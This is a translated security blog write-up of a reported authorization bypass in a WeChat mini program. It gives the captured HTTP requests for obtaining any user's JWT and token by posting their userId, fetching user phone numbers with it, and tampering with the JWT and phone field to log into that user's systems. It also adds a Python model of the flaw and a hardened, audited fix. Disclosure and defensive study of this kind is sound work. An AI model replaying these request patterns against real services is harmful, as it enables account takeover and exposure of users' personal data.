Disclaimer
Any direct or indirect consequences and losses caused by disseminating or using the information provided by this public account "隼目安全" are the sole responsibility of the user; the public account "隼目安全" and the author bear no responsibility for them. Once consequences arise, please bear them yourself! If there is any infringement, please let us know and we will delete the content immediately and apologize. Thank you!
This vulnerability has already been reported to the relevant organization and platform; all images and content in this article have been redacted!!!
Search WeChat for the mini program xxx.
![Image 1 - [Vulnerability Hunting] Record of an Authorization Bypass - 隼目安全](https://www.cn-fnst.top/wp-content/uploads/2025/01/frc-5a050b0f5a7d444374e4fd63c0c143f3.png)
Search for the website:
http://xxxx.xxxx.com/login?backUrl=http://cloud.xxxx.com
![Image 2 - [Vulnerability Hunting] Record of an Authorization Bypass - 隼目安全](https://www.cn-fnst.top/wp-content/uploads/2025/01/frc-6a2bc69dede6e41c4d8dcdef93f31f42.png)
Register, or log in via WeChat authorization, to enter.
![Image 3 - [Vulnerability Hunting] Record of an Authorization Bypass - 隼目安全](https://www.cn-fnst.top/wp-content/uploads/2025/01/frc-c6d7687d9097d312b58608d3d57905ec.png)
Capture the mini program's authorization-login traffic to obtain the userId.
![Image 4 - [Vulnerability Hunting] Record of an Authorization Bypass - 隼目安全](https://www.cn-fnst.top/wp-content/uploads/2025/01/frc-b1ebb9d887e1b5214f1022e50957187f.png)
The request payload that is called:
```http
POST /imnet/api/getJwtTokenAndToken h2
host: xxxxxx.xxxx.com
content-length: 14
reqable-id: reqable-id-6245450e-dfed-4467-9111-adf9aeb6ebc6
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090c11)XWEB/11581
accept: application/json
accept-encoding: gzip, deflate, br
content-type: application/x-www-form-urlencoded
cookie: JSESSIONID=A013BBDC80F295FFEACBEC6434ADC3C1
x-requested-with: XMLHttpRequest
token:xxxxxxxxxx
origin: https://xxxxxx.xxxx.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://xxxxxx.xxxx.com/appPreEntry?token=xxxxxxxxxxxxxxxxxxx&userId=xxxxxxx&procedureLetter=WEIXIN&version=1.0
accept-language: zh-CN,zh;q=0.9

userId=xxxxxxx
```
This returns the JWT and the token of whichever user the posted userId names, i.e. any other user's credentials.
![Image 5 - [Vulnerability Hunting] Record of an Authorization Bypass - 隼目安全](https://www.cn-fnst.top/wp-content/uploads/2025/01/frc-0387bf0d9e33f20df4c18d92eb5943ce.png)
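The root cause described above is that the token-issuing endpoint takes the subject identity from the posted userId rather than from the server-side session. The following Python example, added here and not part of the original post or the affected system, models that vulnerable handler beside a hardened one that binds the issued JWT to the session user and audits any mismatching userId; the signing key, session table and userId values are constructed.

```python
import base64
import hashlib
import hmac
import json
import time

# Assumption: demo signing key and session table, constructed for this example.
SECRET = b"constructed-demo-secret"
SESSIONS = {"sess-demo": "1001"}  # session cookie value -> authenticated userId
AUDIT_LOG = []  # events a SOC would forward to its SIEM


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def make_jwt(user_id: str, ttl: int = 3600) -> str:
    """Mint a minimal HS256 JWT whose subject is user_id (stdlib only)."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = _b64url(json.dumps({"sub": user_id, "exp": int(time.time()) + ttl}).encode())
    sig = hmac.new(SECRET, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"


def jwt_subject(token: str) -> str:
    """Read the 'sub' claim (padding restored) to show whose token was issued."""
    payload = token.split(".")[1]
    return json.loads(base64.urlsafe_b64decode(payload + "=" * (-len(payload) % 4)))["sub"]


def get_token_vulnerable(session_id: str, form: dict):
    """Mirrors the bug in the write-up: the subject is whatever userId the client posts."""
    if session_id not in SESSIONS:
        return 401, None
    return 200, make_jwt(form["userId"])


def get_token_fixed(session_id: str, form: dict):
    """Hardened handler: the subject is the server-side session identity only.
    A client-supplied userId that disagrees with the session is refused and audited."""
    user = SESSIONS.get(session_id)
    if user is None:
        return 401, None
    requested = form.get("userId")
    if requested is not None and requested != user:
        AUDIT_LOG.append({"event": "userid_mismatch", "session_user": user, "requested": requested})
        return 403, None
    return 200, make_jwt(user)
```

The audit event is the detection hook: a session requesting a token for a userId other than its own is exactly the traffic pattern the write-up exploits.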
Call the payload:
```http
GET /restaurant/wqbUser/pageList h2
host: xxxxxx.xxxx.com
reqable-id: reqable-id-607c2d5e-d427-47cc-b67f-ac10c97fab3a
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 MicroMessenger/7.0.20.xxxx(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090c11)XWEB/11581
accept: */*
accept-encoding: gzip, deflate, br
cookie: xxxxxxxxxxxxxxxxxxxxxxxxx
xweb_xhr: 1
token: E94F04932366FC3756B2319AB312134C   <- the token obtained from the previous payload goes here
content-type: application/json
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://xxxxxxxxxxxx.com/wx95aa572faff6320a/102/page-frame.html
accept-language: zh-CN,zh;q=0.9
```
Calling this payload returns the user's information and phone number.
![Image 6 - [Vulnerability Hunting] Record of an Authorization Bypass - 隼目安全](https://www.cn-fnst.top/wp-content/uploads/2025/01/frc-67866052d7f0fdbd7df7671597906d53.png)
After login, the site URL carries a JWT; modify the JWT and capture the request.
![Image 7 - [Vulnerability Hunting] Record of an Authorization Bypass - 隼目安全](https://www.cn-fnst.top/wp-content/uploads/2025/01/frc-c3e1326a70dafc1a1b79c1f60fedca9e.png)
Change the phone field in the request to the phone number obtained under the token that corresponds to this JWT.
![Image 8 - [Vulnerability Hunting] Record of an Authorization Bypass - 隼目安全](https://www.cn-fnst.top/wp-content/uploads/2025/01/frc-852a47d1298f78867adce417eac719f5.png)
If the response is true, forward the packet.
![Image 9 - [Vulnerability Hunting] Record of an Authorization Bypass - 隼目安全](https://www.cn-fnst.top/wp-content/uploads/2025/01/frc-7db6397eedc9c77cefe70db144f793ab.png)
This successfully logs in to the user's system home page.
Select one of the systems, enter it, and capture the request.
![Image 10 - [Vulnerability Hunting] Record of an Authorization Bypass - 隼目安全](https://www.cn-fnst.top/wp-content/uploads/2025/01/frc-1d4fcf2cede49507b16bcb2a12cf65ec.png)
Here the phone number is again changed to the phone number from before.
![Image 11 - [Vulnerability Hunting] Record of an Authorization Bypass - 隼目安全](https://www.cn-fnst.top/wp-content/uploads/2025/01/frc-08b1539ad63c485a3216a5cb19b265aa.png)
This grants access to the system; the other official systems work the same way.
![Image 12 - [Vulnerability Hunting] Record of an Authorization Bypass - 隼目安全](https://www.cn-fnst.top/wp-content/uploads/2025/01/frc-7fc0bd23913ddc7bc8b25fc7daeff263.gif)
![Image 13 - [Vulnerability Hunting] Record of an Authorization Bypass - 隼目安全](https://www.cn-fnst.top/wp-content/uploads/2025/01/frc-3b63b85b5e3e160ae5808ab2911bf896.png)